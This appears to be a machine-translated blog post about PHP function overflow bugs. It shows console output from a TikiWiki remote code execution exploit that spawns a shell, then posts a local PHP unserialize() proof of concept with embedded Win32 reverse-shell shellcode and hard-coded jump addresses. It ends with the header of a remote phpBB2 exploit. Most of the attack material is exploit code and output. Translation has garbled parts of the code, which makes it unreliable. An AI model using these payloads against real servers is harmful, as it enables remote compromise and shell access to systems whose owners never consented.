PHP function overflow in Popular Science (I)

Surging clouds

Almost all groups are discussing an exp banner thrown by Stefan Esser this afternoon.

He will announce it at the syscan conference tomorrow.

Http://pastebin.com/mXGidCsd

$./Exploit. py-h http://t.testsystem/
PHP xxx () Remote Code Execution Exploit (TikiWiki Version)
Copyright (C) 2010 Stefan Esser/SektionEins GmbH
* ** Do not distribute ***

[+] Connecting to determine wordsize
[+] Wordsize is 32 bit
[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
[+] PHP version is 5.3.x
[+] Connecting to determine XXX version
[+] PHP version> = 5.3.2
[+] Determining endianess of system
[+] System is little endian
[+] Leaking address of std_object_handlers
[+] Found std_object_handlers address to be 0xb76e84a0
[+] Leaking std_object_handlers
[+] Retrieved values (values, numbers, 0xb75b2300, numbers, 0xb75b52f0, 0xb75b3fc0, numbers, numbers, 0x00000000, 0x00000000, 0xb75b360, numbers, 0xb75ba0, expires, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
[+] Optimized to 0xb74008f0
[+] Scanning for executable header
[+] ELF header found at 0xb73ab000
[+] Retrieving and parsing ELF header
[+] Retrieving program headers
[+] Retrieving ELF string table
[+] Looking up ELF symbol: executor_globals
[+] Found executor_globals at 0xb76fe280
[+] Looking up ELF symbol: php_execute_script
[+] Found php_execute_script at 0xb751_c0
[+] Looking up ELF symbol: zend_eval_string
[+] Found zend_eval_string at 0xb7586580
[+] Searching JMPBUF in executor_globals
[+] Found JMPBUF at 0xbfcc64b4
[+] Attempt to crack JMPBUF
[+] Determined stored EIP value 0xb753875a from pattern match
[+] Calculated XORER 0x68ab06ea
[+] Unmangled stored ESP is 0xbfcc5470
[+] Checking memory infront of JMPBUF for overwriting possibilities
[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
[+] Returning into PHP... Spawning a shell at port 4444

...
$ Nc t. testsystem 4444
Welcome to the PHPShell 5/22/2010 am

System ("uname-");
Linux fedora13x86 2.6.33.4-95. fc13.i686. PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
System ("id ");
Uid = 48 (apache) gid = 484 (apache) groups = 484 (apache) context = unconfined_u: system_r: httpd_t: s0

...

I was embarrassed to write this blog, but many of my friends were so scared that they thought they had to go 0-day again.

In fact, PHP function vulnerabilities are not so terrible. Because the utilization conditions are harsh. It requires the Web application to use a function with a vulnerability, and the input of this function can be controlled by the user. In this way, there are more conditions.

In fact, there are other conditions for stable use, because modern OS has many anti-overflow features, such as ASLR, DEP, NX, etc, but Stefan Esser is able to solve this problem well. He dug PHP and used it stably.Memory Information LeakageTo obtain the target address.

Note that"Memory Information Leakage"Not"Memory leakage", The latter can only let the App down, and" memory information leakage "is to be able to read the memory address, so as to ensure stable overflow.

So,PHP vulnerability! = Web Server Vulnerabilities

Pay attention to the parts marked in bold above, which shows that this vulnerability is a function used in Tikiwiki, and Stefan Esser still exploits his consistent memory address information leakage vulnerability, to use this vulnerability stably.

Similarly, PHP function overflow can also be used locally to bypass safemode. That is to say, write a PHP file to the server and execute the request once to trigger the vulnerability exploitation function to execute shellcode. There are many shellcode functions, including executing arbitrary commands, binding ports, and anti-connection.

However, PHP is executed by Webserver, so it only has the webserver permission.

Therefore,For PHP function vulnerabilities, you need to find the corresponding Web App. The core condition is the function'sInputCan be controlled by users.Experienced friends can start searching for googlecode after login.

The effect is not big, and the 0-day period does not appear.

These are all things of tooooold. Two or three years ago, Stefan Esser studied The concurrency on The first Month of PHP Bugs. When I wrote a remote overflow exp of phpbb, however, since metasploit was written, I have never disclosed this exp. I didn't try to overwrite these things a long time ago. I will post them here this time. We can see that the date written in comments is in February March, more than three years old.

Post a local POC, the same vulnerability.
<? Php

$ Shellcode =
"X90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 ".
"X90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 ".
"X90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 ".
"X90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 ".
"X90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 ".
"X90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 ".

// Win32_reverse-EXITFUNC = thread LHOST = 127.0.0.1 LPORT = 1154 Size = 287 Encoder = None http://metasploit.com; port 1154 is used because this is LISA's ascii format, haha
"Xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45 ".
"X3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49 ".
"X8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d ".
"X01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66 ".
"X8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61 ".
"Xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40 ".
"X08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32 ".
"X68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6 ".
"X5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09 ".
"Xf5xadx57xffxd6x53x53x53x53x43x53x43x43x53xffxd0x68 ".
"X7fx00x00x01x66x68x04x82x66x53x89xe1x95x68xecxf9 ".
"Xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68 ".
"X63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3 ".
"Xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab ".
"X68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51 ".
"X6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6 ".
"X6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6 ".
"Xffx77xfcxffxd0x68xefxcexe0x60x53xffxd6xffxd0 ";

$ Hashtable = "xffx54x24x68x90 ";
$ Hashtable. = str_repeat ("A", 34 );

$ Hashtable [5*4 + 0] = chr (0x50 );
$ Hashtable [5*4 + 1] = chr (0x20 );
$ Hashtable [5*4 + 2] = chr (0x40 );
$ Hashtable [5*4 + 3] = chr (0x00 );

// Php4.4.4 jmp ebx 0x00401820 ws2_32.dll 0x71b65fb0
$ Hashtable [8*4 + 0] = chr (0xb0 );
$ Hashtable [8*4 + 1] = chr (0x5f );
$ Hashtable [8*4 + 2] = chr (0xb6 );
$ Hashtable [8*4 + 3] = chr (0x71 );

$ Str = a: 100000: {s: 8: "AAAABBBB"; a: 3: {s: 12: "0123456789AA"; a: 1: {s: 12: "AAAABBBBCCCC"; I: 0;} s: 12: "012345678AAA"; I: 0; s: 12: "012345678BAN"; I: 0 ;};
For ($ I = 0; I I <65535; $ I ++ ){
$ Str. = I: 0; R: 2 ;;
}

$ Payload = s:. strlen ($ shellcode).: ". $ shellcode .";;

$ Str. = s: 39: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; s: 39: ". $ hashtable."; I: 0; R: 3;. $ payload;

Unserialize ($ str );

?>

========================================================== ==========================================

Remote exploitation of the same vulnerability, because PHPBB is used in the program and can be remotely triggered by users!

/*
* PHP <4.4.5 unserialize () ZVAL Reference remote exploits for PHPBB2 (Linux/x86)
*
* (Unusual Version)
* Compilation Method (Linux): gcc-o xxx. c-I/usr/kerberos/include-lssl-lcrypt-O3-Wall-pipe
*
* Problems:
*
* Shellcode is in the heap area. Some old Linux versions are generally above 0x08100000, and the new Linux heap address is not easy to determine.
* The jmp edi method does not require brute-force address guessing. However, you need to debug various Linux versions. In addition, some new versions of the Linux stack cannot be executed, and the lib addresses are random.
*
*
* I hope you can change the general exp. This year, even Linux stack overflow is hard to use!
*
* Update history:
* + Supports brute-force shellcode address prediction.
* + After jmp edi is used and a short shellcode is used to search for the shellcode in the heap and execute